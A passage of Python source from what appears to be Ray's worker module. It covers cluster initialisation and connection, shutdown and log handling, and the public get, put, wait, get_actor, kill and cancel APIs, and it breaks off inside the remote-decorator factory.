if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
if driver_mode == SCRIPT_MODE and job_config:
# Rewrite the URI. Note the package isn't uploaded to the URI until
# later in the connect
runtime_env_pkg.rewrite_runtime_env_uris(job_config)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook
def shutdown(_exiting_interpreter=False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = ray.gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ":event_summary:" in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"autoscaling status. To disable autoscaler event "
"messages, you can set AUTOSCALER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(":event_summary:")[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
def print_worker_logs(data: Dict[str, str], print_file: Any):
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data["pid"] in ["autoscaler", "raylet"]:
return ""
else:
return "pid="
def color_for(data: Dict[str, str]) -> str:
"""The color for this log line."""
if data["pid"] == "raylet":
return colorama.Fore.YELLOW
elif data["pid"] == "autoscaler":
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data["pid"] == "autoscaler":
pid = "{} +{}".format(data["pid"], time_string())
lines = filter_autoscaler_events(data["lines"])
else:
pid = data["pid"]
lines = data["lines"]
if data["ip"] == data["localhost"]:
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM, color_for(data),
prefix_for(data), pid,
colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(
colorama.Style.DIM, color_for(data), prefix_for(data), pid,
data["ip"], colorama.Style.RESET_ALL, line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = ray.gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = ray.gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = ray.gcs_utils.ErrorTableData.FromString(
pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook
def is_initialized():
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
runtime_env_json="{}",
worker_shim_pid=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
ray_debugger_host (bool): The host to bind a Ray debugger to on
this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE,
UTIL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
worker.ray_debugger_external = ray_debugger_external
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid)
worker.gcs_client = worker.core_worker.get_gcs_client()
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environmen will be prepared
# at the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
runtime_env_pkg.upload_runtime_env_package_if_needed(job_config)
elif mode == WORKER_MODE:
# TODO(ekl) get rid of the env var hack and get runtime env from the
# task spec and/or job config only.
uris = []
global_job_config = worker.core_worker.get_job_config()
override_runtime_env = json.loads(runtime_env_json)
if os.environ.get("RAY_PACKAGING_URI"):
uris = [os.environ.get("RAY_PACKAGING_URI")]
if global_job_config.runtime_env.uris:
uris = global_job_config.runtime_env.uris
if override_runtime_env.get("uris"):
# TODO(simon): should we combine the uris from package and global
# job config if they are present?
uris = override_runtime_env["uris"]
working_dir = runtime_env_pkg.ensure_runtime_env_setup(uris)
if working_dir is not None:
os.chdir(working_dir)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE, UTIL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message, key="", dtype="text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple message under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
data_type (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook
def get(object_refs, *, timeout=None):
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook
def put(value, *, _owner=None):
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = ray.gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook
def wait(object_refs, *, num_returns=1, timeout=None, fetch_local=True):
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook
def get_actor(name):
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
worker = global_worker
worker.check_connected()
split_names = name.split("/", maxsplit=1)
if len(split_names) <= 1:
name = split_names[0]
namespace = ""
else:
# must be length 2
namespace, name = split_names
return worker.core_worker.get_named_actor_handle(name, namespace)
@PublicAPI
@client_mode_hook
def kill(actor, *, no_restart=True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook
def cancel(object_ref, *, force=False, recursive=True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
worker=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, runtime_env)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
